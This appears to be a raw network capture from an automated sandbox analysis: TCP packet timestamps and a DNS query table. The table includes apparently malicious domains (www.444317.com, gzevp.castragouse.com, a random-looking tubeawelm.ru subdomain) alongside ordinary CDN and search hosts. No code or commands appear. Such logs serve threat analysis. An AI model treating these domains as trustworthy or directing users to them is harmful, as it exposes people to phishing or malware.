                                                                                                                                                            Oct 8, 2024 05:09:10.650260925 CEST4434987313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.650355101 CEST49873443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:10.650525093 CEST49873443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:10.650541067 CEST4434987313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.729016066 CEST4434986713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.729198933 CEST4434986713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.730068922 CEST49867443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:10.730535984 CEST49867443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:10.730577946 CEST4434986713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.730608940 CEST49867443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:10.730624914 CEST4434986713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.733694077 CEST49874443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:10.733736038 CEST4434987413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.733872890 CEST49874443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:10.734064102 CEST49874443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:10.734080076 CEST4434987413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.978159904 CEST44349868104.18.94.41192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.990326881 CEST49868443192.168.2.5104.18.94.41
                                                                                                                                                            Oct 8, 2024 05:09:10.990359068 CEST44349868104.18.94.41192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.991540909 CEST44349868104.18.94.41192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:10.992944002 CEST49868443192.168.2.5104.18.94.41
                                                                                                                                                            Oct 8, 2024 05:09:10.993109941 CEST49868443192.168.2.5104.18.94.41
                                                                                                                                                            Oct 8, 2024 05:09:10.993123055 CEST44349868104.18.94.41192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.043348074 CEST49868443192.168.2.5104.18.94.41
                                                                                                                                                            Oct 8, 2024 05:09:11.106596947 CEST44349872172.67.197.235192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.131890059 CEST44349868104.18.94.41192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.132055998 CEST44349868104.18.94.41192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.132183075 CEST49868443192.168.2.5104.18.94.41
                                                                                                                                                            Oct 8, 2024 05:09:11.136739969 CEST49872443192.168.2.5172.67.197.235
                                                                                                                                                            Oct 8, 2024 05:09:11.136782885 CEST44349872172.67.197.235192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.137600899 CEST49868443192.168.2.5104.18.94.41
                                                                                                                                                            Oct 8, 2024 05:09:11.137619972 CEST44349868104.18.94.41192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.141035080 CEST44349872172.67.197.235192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.141115904 CEST49872443192.168.2.5172.67.197.235
                                                                                                                                                            Oct 8, 2024 05:09:11.142307997 CEST49872443192.168.2.5172.67.197.235
                                                                                                                                                            Oct 8, 2024 05:09:11.142514944 CEST44349872172.67.197.235192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.142796993 CEST49872443192.168.2.5172.67.197.235
                                                                                                                                                            Oct 8, 2024 05:09:11.142807007 CEST44349872172.67.197.235192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.184322119 CEST49872443192.168.2.5172.67.197.235
                                                                                                                                                            Oct 8, 2024 05:09:11.238646030 CEST4434987313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.239187002 CEST49873443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.239209890 CEST4434987313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.239588022 CEST49873443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.239590883 CEST4434987313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.257656097 CEST4434987013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.258128881 CEST49870443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.258157015 CEST4434987013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.258517027 CEST49870443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.258522034 CEST4434987013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.258794069 CEST4434987113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.259095907 CEST49871443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.259172916 CEST4434987113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.259557009 CEST49871443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.259572029 CEST4434987113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.260936975 CEST4434986913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.261466026 CEST49869443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.261478901 CEST4434986913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.262057066 CEST49869443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.262059927 CEST4434986913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.336283922 CEST4434987313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.336543083 CEST4434987313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.336601973 CEST49873443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.336699963 CEST49873443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.336710930 CEST4434987313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.336724043 CEST49873443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.336729050 CEST4434987313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.339507103 CEST49875443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.339540005 CEST4434987513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.339792013 CEST49875443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.339962006 CEST49875443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.339967012 CEST4434987513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.358078003 CEST4434987113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.358625889 CEST4434987113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.358683109 CEST49871443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.358711958 CEST49871443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.358727932 CEST4434987113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.358740091 CEST49871443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.358746052 CEST4434987113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.359919071 CEST4434987013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.360179901 CEST4434987013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.360230923 CEST4434987013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.360239029 CEST49870443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.360275030 CEST49870443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.360304117 CEST49870443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.360321045 CEST4434987013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.360332012 CEST49870443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.360337019 CEST4434987013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.361498117 CEST49876443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.361545086 CEST4434987613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.361696005 CEST49876443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.361804962 CEST49876443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.361818075 CEST4434987613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.362421989 CEST49877443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.362461090 CEST4434987713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.362529039 CEST49877443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.362622023 CEST49877443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.362636089 CEST4434987713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.363751888 CEST4434986913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.363886118 CEST4434986913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.363940954 CEST49869443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.363969088 CEST49869443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.363974094 CEST4434986913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.363982916 CEST49869443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.363986015 CEST4434986913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.365864038 CEST49878443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.365875959 CEST4434987813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.365942001 CEST49878443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.366086960 CEST49878443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.366100073 CEST4434987813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.424190044 CEST4434987413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.425309896 CEST49874443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.425335884 CEST4434987413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.429528952 CEST49874443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.429536104 CEST4434987413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.527661085 CEST4434987413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.527872086 CEST4434987413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.527921915 CEST49874443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.528060913 CEST49874443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.528060913 CEST49874443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.528074980 CEST4434987413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.528084993 CEST4434987413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.530745029 CEST49879443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.530787945 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.530863047 CEST49879443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.531152964 CEST49879443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:11.531166077 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.821444035 CEST44349872172.67.197.235192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.821528912 CEST44349872172.67.197.235192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.821609020 CEST49872443192.168.2.5172.67.197.235
                                                                                                                                                            Oct 8, 2024 05:09:11.822536945 CEST49872443192.168.2.5172.67.197.235
                                                                                                                                                            Oct 8, 2024 05:09:11.822561979 CEST44349872172.67.197.235192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.843806982 CEST49880443192.168.2.540.114.177.156
                                                                                                                                                            Oct 8, 2024 05:09:11.843900919 CEST4434988040.114.177.156192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.843935013 CEST49881443192.168.2.540.114.177.156
                                                                                                                                                            Oct 8, 2024 05:09:11.843976974 CEST4434988140.114.177.156192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.843976974 CEST49880443192.168.2.540.114.177.156
                                                                                                                                                            Oct 8, 2024 05:09:11.844079018 CEST49881443192.168.2.540.114.177.156
                                                                                                                                                            Oct 8, 2024 05:09:11.844273090 CEST49881443192.168.2.540.114.177.156
                                                                                                                                                            Oct 8, 2024 05:09:11.844288111 CEST4434988140.114.177.156192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.844449997 CEST49880443192.168.2.540.114.177.156
                                                                                                                                                            Oct 8, 2024 05:09:11.844484091 CEST4434988040.114.177.156192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.898823977 CEST49882443192.168.2.5172.67.197.235
                                                                                                                                                            Oct 8, 2024 05:09:11.898847103 CEST44349882172.67.197.235192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:11.899121046 CEST49882443192.168.2.5172.67.197.235
                                                                                                                                                            Oct 8, 2024 05:09:11.899363041 CEST49882443192.168.2.5172.67.197.235
                                                                                                                                                            Oct 8, 2024 05:09:11.899373055 CEST44349882172.67.197.235192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.009563923 CEST4434987713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.010118008 CEST49877443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.010163069 CEST4434987713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.010251999 CEST4434987813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.010684013 CEST49877443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.010694027 CEST4434987713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.011168957 CEST49878443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.011198044 CEST4434987813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.011624098 CEST49878443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.011635065 CEST4434987813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.026218891 CEST4434987513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.026777983 CEST49875443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.026806116 CEST4434987513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.027390957 CEST49875443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.027398109 CEST4434987513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.027970076 CEST4434987613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.028357029 CEST49876443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.028393984 CEST4434987613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.028702974 CEST49876443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.028709888 CEST4434987613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.107047081 CEST4434987713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.107127905 CEST4434987713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.107242107 CEST4434987713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.107320070 CEST49877443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.107320070 CEST49877443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.107440948 CEST49877443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.107440948 CEST49877443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.107486010 CEST4434987713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.107517004 CEST4434987713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.107825994 CEST4434987813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.108215094 CEST4434987813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.108277082 CEST49878443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.109416962 CEST49878443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.109416962 CEST49878443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.109432936 CEST4434987813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.109453917 CEST4434987813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.117223024 CEST49883443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.117261887 CEST4434988313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.117305040 CEST49884443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.117333889 CEST4434988413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.117341995 CEST49883443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.117425919 CEST49884443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.117486954 CEST49883443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.117497921 CEST4434988313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.117567062 CEST49884443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.117578983 CEST4434988413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.129354954 CEST4434987613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.129695892 CEST4434987613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.129755020 CEST49876443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.129805088 CEST49876443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.129823923 CEST4434987613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.129838943 CEST49876443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.129846096 CEST4434987613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.129915953 CEST4434987513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.130248070 CEST4434987513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.130306005 CEST49875443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.130326033 CEST4434987513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.130346060 CEST4434987513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.130394936 CEST49875443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.130395889 CEST49875443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.130415916 CEST49875443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.130428076 CEST4434987513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.131987095 CEST49885443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.132014990 CEST4434988513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.132091045 CEST49885443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.132206917 CEST49885443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.132219076 CEST4434988513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.132647038 CEST49886443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.132653952 CEST4434988613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.132736921 CEST49886443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.132883072 CEST49886443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.132891893 CEST4434988613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.193622112 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.193969011 CEST49879443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.193986893 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.194341898 CEST49879443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.194346905 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.292669058 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.292881012 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.292937994 CEST49879443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.292948008 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.292984009 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.293078899 CEST49879443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.293078899 CEST49879443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.293101072 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.293114901 CEST49879443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.293122053 CEST4434987913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.295193911 CEST49887443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.295214891 CEST4434988713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:12.295279026 CEST49887443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.295433998 CEST49887443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:12.295442104 CEST4434988713.107.246.60192.168.2.5
                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Oct 8, 2024 05:08:37.688916922 CEST192.168.2.51.1.1.10xd3beStandard query (0)www.444317.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:37.689089060 CEST192.168.2.51.1.1.10xcc21Standard query (0)www.444317.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:37.704065084 CEST192.168.2.51.1.1.10xbcecStandard query (0)www.444317.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:37.704361916 CEST192.168.2.51.1.1.10xba37Standard query (0)www.444317.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:39.924176931 CEST192.168.2.51.1.1.10xb46Standard query (0)gzevp.castragouse.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:39.924875021 CEST192.168.2.51.1.1.10x3783Standard query (0)gzevp.castragouse.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:39.926384926 CEST192.168.2.51.1.1.10xec5bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:39.926917076 CEST192.168.2.51.1.1.10x49c6Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.991653919 CEST192.168.2.51.1.1.10x80a8Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.991911888 CEST192.168.2.51.1.1.10x3f42Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.992263079 CEST192.168.2.51.1.1.10xd2b0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.992403030 CEST192.168.2.51.1.1.10xfa74Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.992834091 CEST192.168.2.51.1.1.10x3dacStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.993221045 CEST192.168.2.51.1.1.10x1b27Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.789082050 CEST192.168.2.51.1.1.10x5b07Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.789400101 CEST192.168.2.51.1.1.10xc444Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.822523117 CEST192.168.2.51.1.1.10xab37Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.823025942 CEST192.168.2.51.1.1.10x5977Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:44.009501934 CEST192.168.2.51.1.1.10xf1d1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:44.009983063 CEST192.168.2.51.1.1.10x63edStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:44.366755962 CEST192.168.2.51.1.1.10x60f7Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:44.367150068 CEST192.168.2.51.1.1.10xef70Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:46.340609074 CEST192.168.2.51.1.1.10x56a1Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:46.340609074 CEST192.168.2.51.1.1.10x20b6Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:10.508927107 CEST192.168.2.51.1.1.10x7899Standard query (0)lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:10.509151936 CEST192.168.2.51.1.1.10x8e7Standard query (0)lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:11.832901001 CEST192.168.2.51.1.1.10xa8acStandard query (0)duckduckgo.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:11.833353043 CEST192.168.2.51.1.1.10xa503Standard query (0)duckduckgo.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:11.845959902 CEST192.168.2.51.1.1.10xa4fbStandard query (0)lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:11.846081018 CEST192.168.2.51.1.1.10xb2f9Standard query (0)lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:16.048614025 CEST192.168.2.51.1.1.10xc094Standard query (0)duckduckgo.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:16.048760891 CEST192.168.2.51.1.1.10x13b1Standard query (0)duckduckgo.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:19.149462938 CEST192.168.2.51.1.1.10x5313Standard query (0)improving.duckduckgo.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:19.149462938 CEST192.168.2.51.1.1.10xdcbdStandard query (0)improving.duckduckgo.com65IN (0x0001)false
